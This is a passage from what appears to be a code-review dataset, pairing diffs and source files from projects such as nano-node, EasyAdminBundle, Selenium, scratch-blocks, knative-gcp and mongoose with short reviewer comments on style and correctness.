(nano::gap_information{ std::chrono::steady_clock::now (), hash_a, std::vector<nano::account> (1, representative_a) }); if (inactive_votes_cache.size () > inactive_votes_cache_max) { inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().erase (inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().begin ()); } } } } nano::gap_information nano::active_transactions::find_inactive_votes_cache (nano::block_hash const & hash_a) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end ()) { return *existing; } else { return nano::gap_information{ std::chrono::steady_clock::time_point{}, 0, std::vector<nano::account>{} }; } } void nano::active_transactions::erase_inactive_votes_cache (nano::block_hash const & hash_a) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end ()) { inactive_votes_cache.get<nano::gap_cache::tag_hash> ().erase (existing); } } size_t nano::active_transactions::dropped_elections_cache_size () { nano::lock_guard<std::mutex> guard (mutex); return dropped_elections_cache.size (); } void nano::active_transactions::add_dropped_elections_cache (nano::qualified_root const & root_a) { assert (!mutex.try_lock ()); dropped_elections_cache.get<tag_sequence> ().emplace_back (nano::election_timepoint{ std::chrono::steady_clock::now (), root_a }); if (dropped_elections_cache.size () > dropped_elections_cache_max) { dropped_elections_cache.get<tag_sequence> ().pop_front (); } } std::chrono::steady_clock::time_point nano::active_transactions::find_dropped_elections_cache (nano::qualified_root const & root_a) { assert (!mutex.try_lock ()); auto existing (dropped_elections_cache.get<tag_root> ().find (root_a)); if (existing != dropped_elections_cache.get<tag_root> ().end ()) { return existing->time; } else { return std::chrono::steady_clock::time_point{}; } } nano::cementable_account::cementable_account (nano::account const & account_a, size_t blocks_uncemented_a) : account (account_a), blocks_uncemented (blocks_uncemented_a) { } std::unique_ptr<nano::container_info_component> nano::collect_container_info (active_transactions & active_transactions, const std::string & name) { size_t roots_count; size_t blocks_count; size_t confirmed_count; size_t pending_conf_height_count; { nano::lock_guard<std::mutex> guard (active_transactions.mutex); roots_count = active_transactions.roots.size (); blocks_count = active_transactions.blocks.size (); confirmed_count = active_transactions.confirmed.size (); pending_conf_height_count = active_transactions.pending_conf_height.size (); } auto composite = std::make_unique<container_info_composite> (name); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "roots", roots_count, sizeof (decltype (active_transactions.roots)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "blocks", blocks_count, sizeof (decltype (active_transactions.blocks)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "pending_conf_height", pending_conf_height_count, sizeof (decltype (active_transactions.pending_conf_height)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "confirmed", confirmed_count, sizeof (decltype (active_transactions.confirmed)::value_type) })); composite->add_component 
(std::make_unique<container_info_leaf> (container_info{ "priority_wallet_cementable_frontiers_count", active_transactions.priority_wallet_cementable_frontiers_size (), sizeof (nano::cementable_account) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "priority_cementable_frontiers_count", active_transactions.priority_cementable_frontiers_size (), sizeof (nano::cementable_account) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "inactive_votes_cache_count", active_transactions.inactive_votes_cache_size (), sizeof (nano::gap_information) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "dropped_elections_count", active_transactions.dropped_elections_cache_size (), sizeof (nano::election_timepoint) })); return composite; }
1
16,170
Could use election from `info_a.election`, or is this deliberate?
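A minimal sketch of what the reviewer seems to be suggesting: the conflict_info already carries the election (the surrounding code reads it as it->election / root_it->election), so the modify() lambda could reach it directly instead of doing a separate lookup. Sketch of the idea only, not the author's confirmed intent:

roots.get<tag_root> ().modify (existing_root, [difficulty_a](nano::conflict_info & info_a) {
	info_a.adjusted_difficulty = difficulty_a;
	// info_a.election is available right here if the election object itself
	// is needed, avoiding an extra find () on the container.
});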
nanocurrency-nano-node
cpp
@@ -95,6 +95,15 @@ class EasyAdminExtension extends AbstractTypeExtension { return LegacyFormHelper::getType('form'); } + + /** + * {@inheritdoc} + */ + public static function getExtendedTypes() + { + // needed to avoid a deprecation when using Symfony 4.2 + return [LegacyFormHelper::getType('form')]; + } } class_alias('EasyCorp\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', 'JavierEguiluz\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', false);
1
<?php /* * This file is part of the EasyAdminBundle. * * (c) Javier Eguiluz <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace EasyCorp\Bundle\EasyAdminBundle\Form\Extension; use EasyCorp\Bundle\EasyAdminBundle\Form\Util\LegacyFormHelper; use Symfony\Component\Form\AbstractTypeExtension; use Symfony\Component\Form\FormInterface; use Symfony\Component\Form\FormView; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\RequestStack; /** * Extension that injects EasyAdmin related information in the view used to * render the form. * * @author Maxime Steinhausser <[email protected]> */ class EasyAdminExtension extends AbstractTypeExtension { /** @var Request|null */ private $request; /** @var RequestStack|null */ private $requestStack; /** * @param RequestStack|null $requestStack */ public function __construct(RequestStack $requestStack = null) { $this->requestStack = $requestStack; } /** * {@inheritdoc} */ public function finishView(FormView $view, FormInterface $form, array $options) { if (null !== $this->requestStack) { $this->request = $this->requestStack->getCurrentRequest(); } if (null === $this->request) { return; } if ($this->request->attributes->has('easyadmin')) { $easyadmin = $this->request->attributes->get('easyadmin'); $entity = $easyadmin['entity']; $action = $easyadmin['view']; $fields = isset($entity[$action]['fields']) ? $entity[$action]['fields'] : array(); $view->vars['easyadmin'] = array( 'entity' => $entity, 'view' => $action, 'item' => $easyadmin['item'], 'field' => null, 'form_group' => $form->getConfig()->getAttribute('easyadmin_form_group'), 'form_tab' => $form->getConfig()->getAttribute('easyadmin_form_tab'), ); /* * Checks if current form view is direct child on the topmost form * (ie. this form view`s field exists in easyadmin configuration) */ if (null !== $view->parent && null === $view->parent->parent) { $view->vars['easyadmin']['field'] = isset($fields[$view->vars['name']]) ? $fields[$view->vars['name']] : null; } } } /** * BC for SF < 2.4. * To be replaced by the usage of the request stack when 2.3 support is dropped. * * @param Request|null $request */ public function setRequest(Request $request = null) { $this->request = $request; } /** * {@inheritdoc} */ public function getExtendedType() { return LegacyFormHelper::getType('form'); } } class_alias('EasyCorp\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', 'JavierEguiluz\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', false);
1
11,653
looks like this should be `return array(LegacyFormHelper::getType('form'));`
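A hedged sketch of the change the comment proposes, i.e. the getExtendedTypes() method from the patch returning a long-syntax array (whether the bundle still needs to parse on pre-5.4 PHP, which lacks [], is an assumption; array() also matches the syntax used elsewhere in this class):

    /**
     * {@inheritdoc}
     */
    public static function getExtendedTypes()
    {
        // needed to avoid a deprecation when using Symfony 4.2;
        // array() rather than [] keeps the syntax consistent with the rest of the file
        return array(LegacyFormHelper::getType('form'));
    }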
EasyCorp-EasyAdminBundle
php
@@ -52,6 +52,8 @@ var Server = function(requestHandler) { * with the server host when it has fully started. */ this.start = function(opt_port) { + assert(typeof opt_port !== 'function', + "start invoked with function, not port (mocha callback)?"); var port = opt_port || portprober.findFreePort('localhost'); return promise.when(port, function(port) { return promise.checkedNodeCall(
1
// Copyright 2013 Selenium committers // Copyright 2013 Software Freedom Conservancy // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. 'use strict'; var assert = require('assert'), http = require('http'), url = require('url'); var net = require('../../net'), portprober = require('../../net/portprober'), promise = require('../..').promise; /** * Encapsulates a simple HTTP server for testing. The {@code onrequest} * function should be overridden to define request handling behavior. * @param {function(!http.ServerRequest, !http.ServerResponse)} requestHandler * The request handler for the server. * @constructor */ var Server = function(requestHandler) { var server = http.createServer(function(req, res) { requestHandler(req, res); }); server.on('connection', function(stream) { stream.setTimeout(4000); }); /** @typedef {{port: number, address: string, family: string}} */ var Host; /** * Starts the server on the given port. If no port, or 0, is provided, * the server will be started on a random port. * @param {number=} opt_port The port to start on. * @return {!webdriver.promise.Promise.<Host>} A promise that will resolve * with the server host when it has fully started. */ this.start = function(opt_port) { var port = opt_port || portprober.findFreePort('localhost'); return promise.when(port, function(port) { return promise.checkedNodeCall( server.listen.bind(server, port, 'localhost')); }).then(function() { return server.address(); }); }; /** * Stops the server. * @return {!webdriver.promise.Promise} A promise that will resolve when the * server has closed all connections. */ this.stop = function() { var d = promise.defer(); server.close(d.fulfill); return d.promise; }; /** * @return {Host} This server's host info. * @throws {Error} If the server is not running. */ this.address = function() { var addr = server.address(); if (!addr) { throw Error('There server is not running!'); } return addr; }; /** * return {string} The host:port of this server. * @throws {Error} If the server is not running. */ this.host = function() { return net.getLoopbackAddress() + ':' + this.address().port; }; /** * Formats a URL for this server. * @param {string=} opt_pathname The desired pathname on the server. * @return {string} The formatted URL. * @throws {Error} If the server is not running. */ this.url = function(opt_pathname) { var addr = this.address(); var pathname = opt_pathname || ''; return url.format({ protocol: 'http', hostname: net.getLoopbackAddress(), port: addr.port, pathname: pathname }); }; }; // PUBLIC API exports.Server = Server;
1
11,552
Maybe it would be simpler to ignore opt_port if its type !== 'number'?
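A rough sketch of that alternative: drop the assert added in the patch and fall back to a probed port whenever opt_port is not a number (for instance when Mocha hands the test's done callback to start). Sketch only, under the assumption that silently ignoring a non-numeric argument is acceptable here:

  this.start = function(opt_port) {
    // Ignore anything that is not a usable port number (e.g. a mocha callback).
    var port = (typeof opt_port === 'number' && opt_port) ?
        opt_port : portprober.findFreePort('localhost');
    return promise.when(port, function(port) {
      return promise.checkedNodeCall(
          server.listen.bind(server, port, 'localhost'));
    }).then(function() {
      return server.address();
    });
  };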
SeleniumHQ-selenium
js
@@ -223,10 +223,9 @@ Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION = function() { Blockly.ScratchBlocks.VerticalExtensions.registerAll = function() { var categoryNames = ['control', 'data', 'data_lists', 'sounds', 'motion', 'looks', 'event', - 'sensing', 'pen', 'operators', 'more']; + 'sensing', 'pen', 'operators', 'more']; // Register functions for all category colours. - for (var i = 0; i < categoryNames.length; i++) { - name = categoryNames[i]; + for (var i = 0, name; name = categoryNames[i]; i++) { Blockly.Extensions.register('colours_' + name, Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name)); }
1
/** * @license * Visual Blocks Editor * * Copyright 2017 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Extensions for vertical blocks in scratch-blocks. * The following extensions can be used to describe a block in Scratch terms. * For instance, a block in the operators colour scheme with a number output * would have the "colours_operators" and "output_number" extensions. * @author [email protected] (Rachel Fenichel) */ 'use strict'; goog.provide('Blockly.ScratchBlocks.VerticalExtensions'); goog.require('Blockly.Colours'); goog.require('Blockly.constants'); /** * Helper function that generates an extension based on a category name. * The generated function will set primary, secondary, and tertiary colours * based on the category name. * @param {String} category The name of the category to set colours for. * @return {function} An extension function that sets colours based on the given * category. */ Blockly.ScratchBlocks.VerticalExtensions.colourHelper = function(category) { var colours = Blockly.Colours[category]; if (!(colours && colours.primary && colours.secondary && colours.tertiary)) { throw new Error('Could not find colours for category "' + category + '"'); } /** * Set the primary, secondary, and tertiary colours on this block for the * given category. * @this {Blockly.Block} */ return function() { this.setColourFromRawValues_(colours.primary, colours.secondary, colours.tertiary); }; }; /** * Extension to set the colours of a text field, which are all the same. */ Blockly.ScratchBlocks.VerticalExtensions.COLOUR_TEXTFIELD = function() { this.setColourFromRawValues_(Blockly.Colours.textField, Blockly.Colours.textField, Blockly.Colours.textField); }; /** * Extension to make a block fit into a stack of statements, regardless of its * inputs. That means the block should have a previous connection and a next * connection and have inline inputs. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_STATEMENT = function() { this.setInputsInline(true); this.setPreviousStatement(true, null); this.setNextStatement(true, null); }; /** * Extension to make a block be shaped as a hat block, regardless of its * inputs. That means the block should have a next connection and have inline * inputs, but have no previous connection. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_HAT = function() { this.setInputsInline(true); this.setNextStatement(true, null); }; /** * Extension to make a block be shaped as an end block, regardless of its * inputs. That means the block should have a previous connection and have * inline inputs, but have no next connection. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_END = function() { this.setInputsInline(true); this.setPreviousStatement(true, null); }; /** * Extension to make represent a number reporter in Scratch-Blocks. 
* That means the block has inline inputs, a round output shape, and a 'Number' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_NUMBER = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_ROUND); this.setOutput(true, 'Number'); }; /** * Extension to make represent a string reporter in Scratch-Blocks. * That means the block has inline inputs, a round output shape, and a 'String' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_STRING = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_ROUND); this.setOutput(true, 'String'); }; /** * Extension to make represent a boolean reporter in Scratch-Blocks. * That means the block has inline inputs, a round output shape, and a 'Boolean' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_BOOLEAN = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_HEXAGONAL); this.setOutput(true, 'Boolean'); }; /** * Mixin to add a context menu for a procedure definition block. * It adds the "edit" option and removes the "duplicate" option. * @mixin * @augments Blockly.Block * @package * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_DEF_CONTEXTMENU = { /** * Add the "edit" option and removes the "duplicate" option from the context * menu. * @param {!Array.<!Object>} menuOptions List of menu options to edit. * @this Blockly.Block */ customContextMenu: function(menuOptions) { // Add the edit option at the end. menuOptions.push(Blockly.Procedures.makeEditOption(this)); // Find the delete option and update its callback to be specific to // functions. for (var i = 0, option; option = menuOptions[i]; i++) { if (option.text == Blockly.Msg.DELETE_BLOCK) { var input = this.getInput('custom_block'); // this is the root block, not the shadow block. if (input && input.connection && input.connection.targetBlock()) { var procCode = input.connection.targetBlock().getProcCode(); } else { return; } var rootBlock = this; option.callback = function() { var didDelete = Blockly.Procedures.deleteProcedureDefCallback( procCode, rootBlock); if (!didDelete) { // TODO:(#1151) alert('To delete a block definition, first remove all uses of the block'); } }; } } // Find and remove the duplicate option for (var i = 0, option; option = menuOptions[i]; i++) { if (option.text == Blockly.Msg.DUPLICATE_BLOCK) { menuOptions.splice(i, 1); break; } } } }; /** * Mixin to add a context menu for a procedure call block. * It adds the "edit" option and the "define" option. * @mixin * @augments Blockly.Block * @package * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_CALL_CONTEXTMENU = { /** * Add the "edit" option to the context menu. * @todo Add "go to definition" option once implemented. * @param {!Array.<!Object>} menuOptions List of menu options to edit. * @this Blockly.Block */ customContextMenu: function(menuOptions) { menuOptions.push(Blockly.Procedures.makeEditOption(this)); } }; Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION = function() { this.isScratchExtension = true; }; /** * Register all extensions for scratch-blocks. * @package */ Blockly.ScratchBlocks.VerticalExtensions.registerAll = function() { var categoryNames = ['control', 'data', 'data_lists', 'sounds', 'motion', 'looks', 'event', 'sensing', 'pen', 'operators', 'more']; // Register functions for all category colours. 
for (var i = 0; i < categoryNames.length; i++) { name = categoryNames[i]; Blockly.Extensions.register('colours_' + name, Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name)); } // Text fields transcend categories. Blockly.Extensions.register('colours_textfield', Blockly.ScratchBlocks.VerticalExtensions.COLOUR_TEXTFIELD); // Register extensions for common block shapes. Blockly.Extensions.register('shape_statement', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_STATEMENT); Blockly.Extensions.register('shape_hat', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_HAT); Blockly.Extensions.register('shape_end', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_END); // Output shapes and types are related. Blockly.Extensions.register('output_number', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_NUMBER); Blockly.Extensions.register('output_string', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_STRING); Blockly.Extensions.register('output_boolean', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_BOOLEAN); // Custom procedures have interesting context menus. Blockly.Extensions.registerMixin('procedure_def_contextmenu', Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_DEF_CONTEXTMENU); Blockly.Extensions.registerMixin('procedure_call_contextmenu', Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_CALL_CONTEXTMENU); // Extension blocks have slightly different block rendering. Blockly.Extensions.register('scratch_extension', Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION); }; Blockly.ScratchBlocks.VerticalExtensions.registerAll();
1
9,071
Where was `name` being declared before?
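For context on that question: nothing in registerAll declares `name`, so the pre-patch assignment wrote to whatever `name` resolves to in an outer scope (window.name when run in a browser); the patch scopes it with var in the for initializer instead. Roughly:

  // Before: `name` is never declared in this function.
  for (var i = 0; i < categoryNames.length; i++) {
    name = categoryNames[i];
    Blockly.Extensions.register('colours_' + name,
        Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name));
  }

  // After (as in the patch): `name` is declared in the loop initializer.
  for (var i = 0, name; name = categoryNames[i]; i++) {
    Blockly.Extensions.register('colours_' + name,
        Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name));
  }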
LLK-scratch-blocks
js
@@ -74,6 +74,18 @@ func (t testHelper) UnavailableDeployment() *appsv1.Deployment { return d } +func (t testHelper) UnknownDeployment() *appsv1.Deployment { + d := &appsv1.Deployment{} + d.Name = "unknown" + d.Status.Conditions = []appsv1.DeploymentCondition{ + { + Type: appsv1.DeploymentAvailable, + Status: "Unknown", + }, + } + return d +} + func (t testHelper) ReadyBrokerCellStatus() *BrokerCellStatus { bs := &BrokerCellStatus{} bs.PropagateIngressAvailability(t.AvailableEndpoints())
1
/* Copyright 2020 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( appsv1 "k8s.io/api/apps/v1" corev1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" ) type testHelper struct{} // TestHelper contains helpers for unit tests. var TestHelper = testHelper{} func (t testHelper) UnavailableEndpoints() *corev1.Endpoints { ep := &corev1.Endpoints{} ep.Name = "unavailable" ep.Subsets = []corev1.EndpointSubset{{ NotReadyAddresses: []corev1.EndpointAddress{{ IP: "127.0.0.1", }}, }} return ep } func (t testHelper) AvailableEndpoints() *corev1.Endpoints { return &corev1.Endpoints{ ObjectMeta: metav1.ObjectMeta{ Name: "available", }, Subsets: []corev1.EndpointSubset{{ Addresses: []corev1.EndpointAddress{{ IP: "127.0.0.1", }}, }}, } } func (t testHelper) AvailableDeployment() *appsv1.Deployment { d := &appsv1.Deployment{} d.Name = "available" d.Status.Conditions = []appsv1.DeploymentCondition{ { Type: appsv1.DeploymentAvailable, Status: "True", }, } return d } func (t testHelper) UnavailableDeployment() *appsv1.Deployment { d := &appsv1.Deployment{} d.Name = "unavailable" d.Status.Conditions = []appsv1.DeploymentCondition{ { Type: appsv1.DeploymentAvailable, Status: "False", }, } return d } func (t testHelper) ReadyBrokerCellStatus() *BrokerCellStatus { bs := &BrokerCellStatus{} bs.PropagateIngressAvailability(t.AvailableEndpoints()) bs.SetIngressTemplate("http://localhost") bs.PropagateFanoutAvailability(t.AvailableDeployment()) bs.PropagateRetryAvailability(t.AvailableDeployment()) bs.MarkTargetsConfigReady() return bs }
1
15,717
nit: use `corev1.ConditionUnknown`
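Applying that nit to the helper introduced in the patch would look roughly like this (corev1 is already imported by this file; the only change is the typed constant in place of the "Unknown" string literal):

func (t testHelper) UnknownDeployment() *appsv1.Deployment {
	d := &appsv1.Deployment{}
	d.Name = "unknown"
	d.Status.Conditions = []appsv1.DeploymentCondition{
		{
			Type:   appsv1.DeploymentAvailable,
			Status: corev1.ConditionUnknown, // typed constant instead of the raw "Unknown"
		},
	}
	return d
}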
google-knative-gcp
go
@@ -997,7 +997,10 @@ Mongoose.prototype.isValidObjectId = function(v) { v = v.toString(); } - if (typeof v === 'string' && (v.length === 12 || v.length === 24)) { + if (typeof v === 'string' && v.length === 12) { + return true; + } + if (typeof v === 'string' && v.length === 24 && /^[a-f0-9]*$/.test(v)) { return true; }
1
'use strict'; /*! * Module dependencies. */ if (global.MONGOOSE_DRIVER_PATH) { const deprecationWarning = 'The `MONGOOSE_DRIVER_PATH` global property is ' + 'deprecated. Use `mongoose.driver.set()` instead.'; const setDriver = require('util').deprecate(function() { require('./driver').set(require(global.MONGOOSE_DRIVER_PATH)); }, deprecationWarning); setDriver(); } else { require('./driver').set(require('./drivers/node-mongodb-native')); } const Document = require('./document'); const Schema = require('./schema'); const SchemaType = require('./schematype'); const SchemaTypes = require('./schema/index'); const VirtualType = require('./virtualtype'); const STATES = require('./connectionstate'); const VALID_OPTIONS = require('./validoptions'); const Types = require('./types'); const Query = require('./query'); const Model = require('./model'); const applyPlugins = require('./helpers/schema/applyPlugins'); const get = require('./helpers/get'); const promiseOrCallback = require('./helpers/promiseOrCallback'); const legacyPluralize = require('mongoose-legacy-pluralize'); const utils = require('./utils'); const pkg = require('../package.json'); const cast = require('./cast'); const removeSubdocs = require('./plugins/removeSubdocs'); const saveSubdocs = require('./plugins/saveSubdocs'); const trackTransaction = require('./plugins/trackTransaction'); const validateBeforeSave = require('./plugins/validateBeforeSave'); const Aggregate = require('./aggregate'); const PromiseProvider = require('./promise_provider'); const shardingPlugin = require('./plugins/sharding'); const defaultMongooseSymbol = Symbol.for('mongoose:default'); require('./helpers/printJestWarning'); /** * Mongoose constructor. * * The exports object of the `mongoose` module is an instance of this class. * Most apps will only use this one instance. * * ####Example: * const mongoose = require('mongoose'); * mongoose instanceof mongoose.Mongoose; // true * * // Create a new Mongoose instance with its own `connect()`, `set()`, `model()`, etc. * const m = new mongoose.Mongoose(); * * @api public * @param {Object} options see [`Mongoose#set()` docs](/docs/api/mongoose.html#mongoose_Mongoose-set) */ function Mongoose(options) { this.connections = []; this.models = {}; this.modelSchemas = {}; // default global options this.options = Object.assign({ pluralization: true }, options); const conn = this.createConnection(); // default connection conn.models = this.models; if (this.options.pluralization) { this._pluralize = legacyPluralize; } // If a user creates their own Mongoose instance, give them a separate copy // of the `Schema` constructor so they get separate custom types. (gh-6933) if (!options || !options[defaultMongooseSymbol]) { const _this = this; this.Schema = function() { this.base = _this; return Schema.apply(this, arguments); }; this.Schema.prototype = Object.create(Schema.prototype); Object.assign(this.Schema, Schema); this.Schema.base = this; this.Schema.Types = Object.assign({}, Schema.Types); } else { // Hack to work around babel's strange behavior with // `import mongoose, { Schema } from 'mongoose'`. Because `Schema` is not // an own property of a Mongoose global, Schema will be undefined. 
See gh-5648 for (const key of ['Schema', 'model']) { this[key] = Mongoose.prototype[key]; } } this.Schema.prototype.base = this; Object.defineProperty(this, 'plugins', { configurable: false, enumerable: true, writable: false, value: [ [saveSubdocs, { deduplicate: true }], [validateBeforeSave, { deduplicate: true }], [shardingPlugin, { deduplicate: true }], [removeSubdocs, { deduplicate: true }], [trackTransaction, { deduplicate: true }] ] }); } Mongoose.prototype.cast = cast; /** * Expose connection states for user-land * * @memberOf Mongoose * @property STATES * @api public */ Mongoose.prototype.STATES = STATES; /** * The underlying driver this Mongoose instance uses to communicate with * the database. A driver is a Mongoose-specific interface that defines functions * like `find()`. * * @memberOf Mongoose * @property driver * @api public */ Mongoose.prototype.driver = require('./driver'); /** * Sets mongoose options * * ####Example: * * mongoose.set('test', value) // sets the 'test' option to `value` * * mongoose.set('debug', true) // enable logging collection methods + arguments to the console/file * * mongoose.set('debug', function(collectionName, methodName, ...methodArgs) {}); // use custom function to log collection methods + arguments * * Currently supported options are: * - 'debug': If `true`, prints the operations mongoose sends to MongoDB to the console. If a writable stream is passed, it will log to that stream, without colorization. If a callback function is passed, it will receive the collection name, the method name, then all arugments passed to the method. For example, if you wanted to replicate the default logging, you could output from the callback `Mongoose: ${collectionName}.${methodName}(${methodArgs.join(', ')})`. * - 'returnOriginal': If `false`, changes the default `returnOriginal` option to `findOneAndUpdate()`, `findByIdAndUpdate`, and `findOneAndReplace()` to false. This is equivalent to setting the `new` option to `true` for `findOneAndX()` calls by default. Read our [`findOneAndUpdate()` tutorial](/docs/tutorials/findoneandupdate.html) for more information. * - 'bufferCommands': enable/disable mongoose's buffering mechanism for all connections and models * - 'useCreateIndex': false by default. Set to `true` to make Mongoose's default index build use `createIndex()` instead of `ensureIndex()` to avoid deprecation warnings from the MongoDB driver. * - 'useFindAndModify': true by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * - 'useNewUrlParser': false by default. Set to `true` to make all connections set the `useNewUrlParser` option by default * - 'useUnifiedTopology': false by default. Set to `true` to make all connections set the `useUnifiedTopology` option by default * - 'cloneSchemas': false by default. Set to `true` to `clone()` all schemas before compiling into a model. * - 'applyPluginsToDiscriminators': false by default. Set to true to apply global plugins to discriminator schemas. This typically isn't necessary because plugins are applied to the base schema and discriminators copy all middleware, methods, statics, and properties from the base schema. * - 'applyPluginsToChildSchemas': true by default. Set to false to skip applying global plugins to child schemas * - 'objectIdGetter': true by default. Mongoose adds a getter to MongoDB ObjectId's called `_id` that returns `this` for convenience with populate. Set this to false to remove the getter. 
* - 'runValidators': false by default. Set to true to enable [update validators](/docs/validation.html#update-validators) for all validators by default. * - 'toObject': `{ transform: true, flattenDecimals: true }` by default. Overwrites default objects to [`toObject()`](/docs/api.html#document_Document-toObject) * - 'toJSON': `{ transform: true, flattenDecimals: true }` by default. Overwrites default objects to [`toJSON()`](/docs/api.html#document_Document-toJSON), for determining how Mongoose documents get serialized by `JSON.stringify()` * - 'strict': true by default, may be `false`, `true`, or `'throw'`. Sets the default strict mode for schemas. * - 'strictQuery': false by default, may be `false`, `true`, or `'throw'`. Sets the default [strictQuery](/docs/guide.html#strictQuery) mode for schemas. * - 'selectPopulatedPaths': true by default. Set to false to opt out of Mongoose adding all fields that you `populate()` to your `select()`. The schema-level option `selectPopulatedPaths` overwrites this one. * - 'typePojoToMixed': true by default, may be `false` or `true`. Sets the default typePojoToMixed for schemas. * - 'maxTimeMS': If set, attaches [maxTimeMS](https://docs.mongodb.com/manual/reference/operator/meta/maxTimeMS/) to every query * - 'autoIndex': true by default. Set to false to disable automatic index creation for all models associated with this Mongoose instance. * - 'autoCreate': Set to `true` to make Mongoose call [`Model.createCollection()`](/docs/api/model.html#model_Model.createCollection) automatically when you create a model with `mongoose.model()` or `conn.model()`. This is useful for testing transactions, change streams, and other features that require the collection to exist. * - 'overwriteModels': Set to `true` to default to overwriting models with the same name when calling `mongoose.model()`, as opposed to throwing an `OverwriteModelError`. * * @param {String} key * @param {String|Function|Boolean} value * @api public */ Mongoose.prototype.set = function(key, value) { const _mongoose = this instanceof Mongoose ? this : mongoose; if (VALID_OPTIONS.indexOf(key) === -1) throw new Error(`\`${key}\` is an invalid option.`); if (arguments.length === 1) { return _mongoose.options[key]; } _mongoose.options[key] = value; if (key === 'objectIdGetter') { if (value) { Object.defineProperty(mongoose.Types.ObjectId.prototype, '_id', { enumerable: false, configurable: true, get: function() { return this; } }); } else { delete mongoose.Types.ObjectId.prototype._id; } } return _mongoose; }; /** * Gets mongoose options * * ####Example: * * mongoose.get('test') // returns the 'test' value * * @param {String} key * @method get * @api public */ Mongoose.prototype.get = Mongoose.prototype.set; /** * Creates a Connection instance. * * Each `connection` instance maps to a single database. This method is helpful when managing multiple db connections. 
* * * _Options passed take precedence over options included in connection strings._ * * ####Example: * * // with mongodb:// URI * db = mongoose.createConnection('mongodb://user:pass@localhost:port/database'); * * // and options * const opts = { db: { native_parser: true }} * db = mongoose.createConnection('mongodb://user:pass@localhost:port/database', opts); * * // replica sets * db = mongoose.createConnection('mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/database'); * * // and options * const opts = { replset: { strategy: 'ping', rs_name: 'testSet' }} * db = mongoose.createConnection('mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/database', opts); * * // and options * const opts = { server: { auto_reconnect: false }, user: 'username', pass: 'mypassword' } * db = mongoose.createConnection('localhost', 'database', port, opts) * * // initialize now, connect later * db = mongoose.createConnection(); * db.openUri('localhost', 'database', port, [opts]); * * @param {String} [uri] a mongodb:// URI * @param {Object} [options] passed down to the [MongoDB driver's `connect()` function](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html), except for 4 